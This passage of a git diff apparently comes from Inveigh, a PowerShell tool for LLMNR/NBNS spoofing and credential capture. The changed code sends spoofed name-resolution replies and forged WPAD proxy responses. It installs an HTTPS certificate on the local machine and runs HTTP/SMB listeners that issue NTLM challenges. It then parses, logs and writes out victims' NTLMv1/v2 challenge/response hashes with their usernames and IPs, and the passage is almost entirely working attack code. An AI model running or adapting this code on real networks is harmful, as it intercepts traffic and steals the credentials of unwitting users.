advfirewall show allprofiles state | Where-Object {$_ -match 'ON'} if($firewall_status) { @@ -491,14 +450,14 @@ $inveigh.status_queue.Add("LLMNR/NBNS Spoofer IP Address = $SpooferIP") > $null if($LLMNR -eq 'Y') { - $inveigh.status_queue.Add("LLMNR Spoofing Enabled") > $null + $inveigh.status_queue.Add("LLMNR Spoofer = Enabled") > $null $inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds") > $null - $LLMNR_response_message = "- spoofed response has been sent" + $LLMNR_response_message = "- response sent" } else { - $inveigh.status_queue.Add("LLMNR Spoofing Disabled") > $null - $LLMNR_response_message = "- LLMNR spoofing is disabled" + $inveigh.status_queue.Add("LLMNR Spoofer = Disabled") > $null + $LLMNR_response_message = "- LLMNR spoofer is disabled" } if($NBNS -eq 'Y') @@ -507,46 +466,74 @@ if($NBNS -eq 'Y') if($NBNSTypes.Count -eq 1) { - $inveigh.status_queue.Add("NBNS Spoofing Of Type $NBNSTypes_output Enabled") > $null + $inveigh.status_queue.Add("NBNS Spoofer For Type $NBNSTypes_output = Enabled") > $null } else { - $inveigh.status_queue.Add("NBNS Spoofing Of Types $NBNSTypes_output Enabled") > $null + $inveigh.status_queue.Add("NBNS Spoofer For Types $NBNSTypes_output = Enabled") > $null } $inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds") > $null - $NBNS_response_message = "- spoofed response has been sent" + $NBNS_response_message = "- response sent" } else { - $inveigh.status_queue.Add("NBNS Spoofing Disabled") > $null - $NBNS_response_message = "- NBNS spoofing is disabled" + $inveigh.status_queue.Add("NBNS Spoofer = Disabled") > $null + $NBNS_response_message = "- NBNS spoofer is disabled" +} + +if($SpooferLearning -eq 'Y' -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) +{ + $inveigh.status_queue.Add("Spoofer Learning = Enabled") > $null + + if($SpooferLearningDelay -eq 1) + { + $inveigh.status_queue.Add("Spoofer Learning Delay = $SpooferLearningDelay Minute") > $null + } + elseif($SpooferLearningDelay -gt 1) + { + $inveigh.status_queue.Add("Spoofer Learning Delay = $SpooferLearningDelay Minutes") > $null + } + + if($SpooferLearningInterval -eq 1) + { + $inveigh.status_queue.Add("Spoofer Learning Interval = $SpooferLearningInterval Minute") > $null + } + elseif($SpooferLearningInterval -eq 0) + { + $inveigh.status_queue.Add("Spoofer Learning Interval = Disabled") > $null + } + elseif($SpooferLearningInterval -gt 1) + { + $inveigh.status_queue.Add("Spoofer Learning Interval = $SpooferLearningInterval Minutes") > $null + } + } if($SpooferHostsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) { - $inveigh.status_queue.Add("Spoofing requests for " + $SpooferHostsReply -join ",") > $null + $inveigh.status_queue.Add("Spoofer Hosts Reply = " + ($SpooferHostsReply -join ",")) > $null } if($SpooferHostsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) { - $inveigh.status_queue.Add("Ignoring requests for " + $SpooferHostsIgnore -join ",") > $null + $inveigh.status_queue.Add("Spoofer Hosts Ignore = " + ($SpooferHostsIgnore -join ",")) > $null } if($SpooferIPsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) { - $inveigh.status_queue.Add("Spoofing requests from " + $SpooferIPsReply -join ",") > $null + $inveigh.status_queue.Add("Spoofer IPs Reply = " + ($SpooferIPsReply -join ",")) > $null } if($SpooferIPsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) { - $inveigh.status_queue.Add("Ignoring requests from " + $SpooferIPsIgnore -join ",") > $null + $inveigh.status_queue.Add("Spoofer IPs Ignore = " + ($SpooferIPsIgnore -join ",")) > $null } if($SpooferRepeat -eq 'N') { $inveigh.spoofer_repeat = $false - $inveigh.status_queue.Add("Spoofer Repeating Disabled") > $null + $inveigh.status_queue.Add("Spoofer Repeating = Disabled") > $null } else { @@ -555,54 +542,78 @@ else if($SMB -eq 'Y') { - $inveigh.status_queue.Add("SMB Capture Enabled") > $null + $inveigh.status_queue.Add("SMB Capture = Enabled") > $null } else { - $inveigh.status_queue.Add("SMB Capture Disabled") > $null + $inveigh.status_queue.Add("SMB Capture = Disabled") > $null } if($HTTP -eq 'Y') { - $inveigh.HTTP = $true - $inveigh.status_queue.Add("HTTP Capture Enabled") > $null + + $HTTP_port_check = netstat -anp TCP | findstr 0.0.0.0:80 + + if($HTTP_port_check) + { + $inveigh.HTTP = $false + $inveigh.status_queue.Add("HTTP Capture Disabled Due To In Use Port 80") > $null + } + else + { + $inveigh.HTTP = $true + $inveigh.status_queue.Add("HTTP Capture = Enabled") > $null + } + } else { $inveigh.HTTP = $false - $inveigh.status_queue.Add("HTTP Capture Disabled") > $null + $inveigh.status_queue.Add("HTTP Capture = Disabled") > $null } if($HTTPS -eq 'Y') { - try + $HTTPS_port_check = netstat -anp TCP | findstr 0.0.0.0:443 + + if($HTTPS_port_check) { - $inveigh.HTTPS = $true - $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") - $certificate_store.Open('ReadWrite') - $certificate = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 - $certificate.Import($PWD.Path + "\Inveigh.pfx") - $certificate_store.Add($certificate) - $certificate_store.Close() - $netsh_certhash = "certhash=" + $inveigh.certificate_thumbprint - $netsh_app_ID = "appid={" + $inveigh.certificate_application_ID + "}" - $netsh_arguments = @("http","add","sslcert","ipport=0.0.0.0:443",$netsh_certhash,$netsh_app_ID) - & "netsh" $netsh_arguments > $null - $inveigh.status_queue.Add("HTTPS Capture Enabled") > $null + $inveigh.HTTP = $true + $inveigh.status_queue.Add("HTTPS Capture Disabled Due To In Use Port 443") > $null } - catch + else { - $certificate_store.Close() - $HTTPS="N" - $inveigh.HTTPS = $false - $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Install Error") > $null + + try + { + $inveigh.HTTPS = $true + $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") + $certificate_store.Open('ReadWrite') + $certificate = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 + $certificate.Import($PWD.Path + "\Inveigh.pfx") + $certificate_store.Add($certificate) + $certificate_store.Close() + $netsh_certhash = "certhash=" + $inveigh.certificate_thumbprint + $netsh_app_ID = "appid={" + $inveigh.certificate_application_ID + "}" + $netsh_arguments = @("http","add","sslcert","ipport=0.0.0.0:443",$netsh_certhash,$netsh_app_ID) + & "netsh" $netsh_arguments > $null + $inveigh.status_queue.Add("HTTPS Capture = Enabled") > $null + } + catch + { + $certificate_store.Close() + $HTTPS="N" + $inveigh.HTTPS = $false + $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Install Error") > $null + } + } } else { - $inveigh.status_queue.Add("HTTPS Capture Disabled") > $null + $inveigh.status_queue.Add("HTTPS Capture = Disabled") > $null } if($inveigh.HTTP -or $inveigh.HTTPS) @@ -628,7 +639,7 @@ if($inveigh.HTTP -or $inveigh.HTTPS) if($HTTPResponse) { - $inveigh.status_queue.Add("HTTP/HTTPS Custom Response Enabled") > $null + $inveigh.status_queue.Add("HTTP/HTTPS Custom Response = Enabled") > $null } if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic') @@ -638,7 +649,7 @@ if($inveigh.HTTP -or $inveigh.HTTPS) if($WPADIP -and $WPADPort) { - $inveigh.status_queue.Add("WPAD Response Enabled") > $null + $inveigh.status_queue.Add("WPAD Response = Enabled") > $null $inveigh.status_queue.Add("WPAD = $WPADIP`:$WPADPort") > $null if($WPADDirectHosts) @@ -648,27 +659,24 @@ if($inveigh.HTTP -or $inveigh.HTTPS) $WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";' } - $inveigh.WPAD_response = "function FindProxyForURL(url,host){" + $WPAD_direct_hosts_function + "return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" - $inveigh.status_queue.Add("WPAD Direct Hosts = " + $WPADDirectHosts -join ",") > $null + $WPADResponse = "function FindProxyForURL(url,host){" + $WPAD_direct_hosts_function + "return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" + $inveigh.status_queue.Add("WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null } else { - $inveigh.WPAD_response = "function FindProxyForURL(url,host){return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" + $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" } } elseif($WPADResponse -and !$WPADIP -and !$WPADPort) { - $inveigh.status_queue.Add("WPAD Custom Response Enabled") > $null - $inveigh.WPAD_response = $WPADResponse + $inveigh.status_queue.Add("WPAD Custom Response = Enabled") > $null + $WPADResponse = $WPADResponse } - else + elseif($WPADEmptyFile -eq 'Y') { - if($WPADEmptyFile -eq 'Y') - { - $inveigh.status_queue.Add("WPAD Default Response Enabled") > $null - $inveigh.WPAD_response = "function FindProxyForURL(url,host){return `"DIRECT`";}" - } + $inveigh.status_queue.Add("WPAD Default Response = Enabled") > $null + $WPADResponse = "function FindProxyForURL(url,host){return `"DIRECT`";}" } if($Challenge) @@ -680,7 +688,7 @@ if($inveigh.HTTP -or $inveigh.HTTPS) if($MachineAccounts -eq 'N') { - $inveigh.status_queue.Add("Ignoring Machine Accounts") > $null + $inveigh.status_queue.Add("Machine Account Capture = Disabled") > $null $inveigh.machine_accounts = $false } else @@ -690,7 +698,7 @@ else if($ConsoleOutput -eq 'Y') { - $inveigh.status_queue.Add("Real Time Console Output Enabled") > $null + $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null $inveigh.console_output = $true if($ConsoleStatus -eq 1) @@ -712,7 +720,7 @@ else } else { - $inveigh.status_queue.Add("Real Time Console Output Disabled") > $null + $inveigh.status_queue.Add("Real Time Console Output = Disabled") > $null } } @@ -728,13 +736,13 @@ else if($FileOutput -eq 'Y') { - $inveigh.status_queue.Add("Real Time File Output Enabled") > $null + $inveigh.status_queue.Add("Real Time File Output = Enabled") > $null $inveigh.status_queue.Add("Output Directory = $output_directory") > $null $inveigh.file_output = $true } else { - $inveigh.status_queue.Add("Real Time File Output Disabled") > $null + $inveigh.status_queue.Add("Real Time File Output = Disabled") > $null } if($FileUnique -eq 'Y') @@ -755,56 +763,56 @@ elseif($RunTime -gt 1) $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null } -if($SMBRelay -eq 'N') +if($ShowHelp -eq 'Y') { - - if($ShowHelp -eq 'Y') - { - $inveigh.status_queue.Add("Use Get-Command -Noun Inveigh* to show available functions") > $null - $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh") > $null + $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh") > $null - if($inveigh.console_output) - { - $inveigh.status_queue.Add("Press any key to stop real time console output") > $null - } - + if($inveigh.console_output) + { + $inveigh.status_queue.Add("Press any key to stop real time console output") > $null } - if($inveigh.status_output) +} + +if($inveigh.status_output) +{ + + while($inveigh.status_queue.Count -gt 0) { - while($inveigh.status_queue.Count -gt 0) + if($inveigh.output_stream_only) + { + Write-Output($inveigh.status_queue[0] + $inveigh.newline) + $inveigh.status_queue.RemoveAt(0) + } + else { - if($inveigh.output_stream_only) - { - Write-Output($inveigh.status_queue[0] + $inveigh.newline) - $inveigh.status_queue.RemoveRange(0,1) - } - else + switch -Wildcard ($inveigh.status_queue[0]) { - switch ($inveigh.status_queue[0]) + "* Disabled Due To *" { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveAt(0) + } - "Run Stop-Inveigh to stop Inveigh" - { - Write-Warning($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveRange(0,1) - } - - "Windows Firewall = Enabled" - { - Write-Warning($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveRange(0,1) - } + "Run Stop-Inveigh to stop Inveigh" + { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveAt(0) + } - default - { - Write-Output($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveRange(0,1) - } + "Windows Firewall = Enabled" + { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveAt(0) + } + default + { + Write-Output($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveAt(0) } } @@ -812,18 +820,7 @@ if($SMBRelay -eq 'N') } } -} -else -{ - try - { - Invoke-InveighRelay -HTTP $HTTP -HTTPS $HTTPS -HTTPSCertAppID $HTTPSCertAppID -HTTPSCertThumbprint $HTTPSCertThumbprint -WPADAuth $WPADAuth -SMBRelayTarget $SMBRelayTarget -SMBRelayUsernames $SMBRelayUsernames -SMBRelayAutoDisable $SMBRelayAutoDisable -SMBRelayNetworkTimeout $SMBRelayNetworkTimeout -SMBRelayCommand $SMBRelayCommand -Tool $Tool -ShowHelp $ShowHelp - } - catch - { - $inveigh.running = $false - throw "Invoke-InveighRelay is not loaded" - } + } # Begin ScriptBlocks @@ -831,6 +828,7 @@ else # Shared Basic Functions ScriptBlock $shared_basic_functions_scriptblock = { + function DataToUInt16($field) { [Array]::Reverse($field) @@ -869,6 +867,7 @@ $shared_basic_functions_scriptblock = $string_extract = New-Object System.String ($string_data,0,$string_data.Length) return $string_extract } + } # SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response @@ -883,7 +882,7 @@ $SMB_NTLM_functions_scriptblock = $payload = $payload -replace "-","" $NTLM_index = $payload.IndexOf("4E544C4D53535000") - if($payload.SubString(($NTLM_index + 16),8) -eq "02000000") + if($NTLM_index -gt 0 -and $payload.SubString(($NTLM_index + 16),8) -eq "02000000") { $NTLM_challenge = $payload.SubString(($NTLM_index + 48),16) } @@ -899,7 +898,7 @@ $SMB_NTLM_functions_scriptblock = $payload = $payload -replace "-","" $NTLMSSP_hex_offset = $payload.IndexOf("4E544C4D53535000") - if($payload.SubString(($NTLMSSP_hex_offset + 16),8) -eq "03000000") + if($NTLMSSP_hex_offset -gt 0 -and $payload.SubString(($NTLMSSP_hex_offset + 16),8) -eq "03000000") { $NTLMSSP_offset = $NTLMSSP_hex_offset / 2 @@ -923,7 +922,7 @@ $SMB_NTLM_functions_scriptblock = $host_offset = DataLength4 ($NTLMSSP_offset + 48) $payload_bytes $NTLM_host_string = DataToString ($NTLMSSP_offset + $host_offset) $host_length $payload_bytes - if ($NTLM_length -gt 24) + if($NTLM_length -gt 24) { $NTLMv2_response = $NTLM_response.Insert(32,':') $NTLMv2_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLMv2_response @@ -952,9 +951,16 @@ $SMB_NTLM_functions_scriptblock = { $inveigh.NTLMv2_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string") } + + if($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP) + { + $inveigh.IP_capture_list.Add($source_IP.IPAddressToString) + } + } + } - else + elseif($NTLM_length -eq 24) { $NTLMv1_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $LM_response + ":" + $NTLM_response + ":" + $NTLM_challenge @@ -982,13 +988,16 @@ $SMB_NTLM_functions_scriptblock = { $inveigh.NTLMv1_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string") } + + if($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP) + { + $inveigh.IP_capture_list.Add($source_IP.IPAddressToString) + } + } - } - if ($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP) - { - $inveigh.IP_capture_list.Add($source_IP.IPAddressToString) } + } } @@ -998,20 +1007,21 @@ $SMB_NTLM_functions_scriptblock = # HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener $HTTP_scriptblock = { - param ($HTTPAuth,$HTTPBasicRealm,$WPADAuth) + param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$WPADAuth,$WPADResponse) function NTLMChallengeBase64 { + param ([String]$Challenge) $HTTP_timestamp = Get-Date $HTTP_timestamp = $HTTP_timestamp.ToFileTime() $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp)) $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - if($inveigh.challenge) + if($Challenge) { - $HTTP_challenge = $inveigh.challenge - $HTTP_challenge_bytes = $inveigh.challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-') + $HTTP_challenge = $Challenge + $HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-') $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} } else @@ -1024,19 +1034,19 @@ $HTTP_scriptblock = $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $HTTP_challenge) > $null $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38, - 0x00,0x00,0x00,0x05,0x82,0x89,0xa + - $HTTP_challenge_bytes + - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06, - 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00, - 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54, - 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00, - 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24, - 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00, - 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61, - 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00, - 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 + - $HTTP_timestamp + - 0x00,0x00,0x00,0x00,0x0a,0x0a + 0x00,0x00,0x00,0x05,0x82,0x89,0xa + + $HTTP_challenge_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06, + 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00, + 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54, + 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00, + 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24, + 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00, + 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61, + 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00, + 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 + + $HTTP_timestamp + + 0x00,0x00,0x00,0x00,0x0a,0x0a $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes) $NTLM = 'NTLM ' + $NTLM_challenge_base64 @@ -1054,7 +1064,7 @@ $HTTP_scriptblock = $inveigh.response = $inveigh.context.Response $NTLM = 'NTLM' $NTLM_auth = $false - $Basic_auth = $false + $basic_auth = $false if($inveigh.request.IsSecureConnection) { @@ -1075,8 +1085,9 @@ $HTTP_scriptblock = } $HTTP_request_time = Get-Date -format 's' + $HTTP_source_IP = $inveigh.request.RemoteEndpoint.Address.IPAddressToString - if($HTTP_request_time -eq $HTTP_request_time_old -and $inveigh.request.RawUrl -eq $HTTP_request_raw_url_old -and $inveigh.request.RemoteEndpoint.Address -eq $HTTP_request_remote_endpoint_old) + if($HTTP_request_time -eq $HTTP_request_time_old -and $inveigh.request.RawUrl -eq $HTTP_request_raw_url_old -and $HTTP_source_IP -eq $HTTP_request_remote_endpoint_old) { $HTTP_raw_url_output = $false } @@ -1087,35 +1098,35 @@ $HTTP_scriptblock = if(!$inveigh.request.headers["Authorization"] -and $inveigh.HTTP_listener.IsListening -and $HTTP_raw_url_output) { - $inveigh.console_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address) - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)]) + $inveigh.console_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from $HTTP_source_IP") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from $HTTP_source_IP")]) } $HTTP_request_raw_url_old = $inveigh.request.RawUrl - $HTTP_request_remote_endpoint_old = $inveigh.request.RemoteEndpoint.Address + $HTTP_request_remote_endpoint_old = $HTTP_source_IP $HTTP_request_time_old = $HTTP_request_time - [String] $authentication_header = $inveigh.request.headers.GetValues('Authorization') + [String]$authentication_header = $inveigh.request.headers.GetValues('Authorization') if($authentication_header.StartsWith('NTLM ')) { $authentication_header = $authentication_header -replace 'NTLM ','' - [Byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header) + [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header) $inveigh.response.StatusCode = 401 - if($HTTP_request_bytes[8] -eq 1) + if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00') { $inveigh.response.StatusCode = 401 - $NTLM = NTLMChallengeBase64 + $NTLM = NTLMChallengeBase64 $Challenge } - elseif($HTTP_request_bytes[8] -eq 3) + elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00') { $NTLM = 'NTLM' $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes - [String] $NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + '*' + [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $inveigh.request.RemoteEndpoint.Port + '*' $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge) $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1) @@ -1144,27 +1155,27 @@ $HTTP_scriptblock = if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")]) + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")]) $inveigh.NTLMv1_list.Add($inveigh.HTTP_NTLM_hash) - if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains $inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) + if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) { - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash) + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $inveigh.HTTP_NTLM_hash) } else { - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ") for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") } - if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))) + if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) { $inveigh.NTLMv1_file_queue.Add($inveigh.HTTP_NTLM_hash) $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) } - if($inveigh.NTLMv1_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) + if($inveigh.NTLMv1_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) { - $inveigh.NTLMv1_username_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") } } @@ -1182,38 +1193,38 @@ $HTTP_scriptblock = $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")]) $inveigh.NTLMv2_list.Add($inveigh.HTTP_NTLM_hash) - if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) + if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) { - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash) + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $inveigh.HTTP_NTLM_hash) } else { - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ") for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") } - if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))) + if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))) { $inveigh.NTLMv2_file_queue.Add($inveigh.HTTP_NTLM_hash) $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + 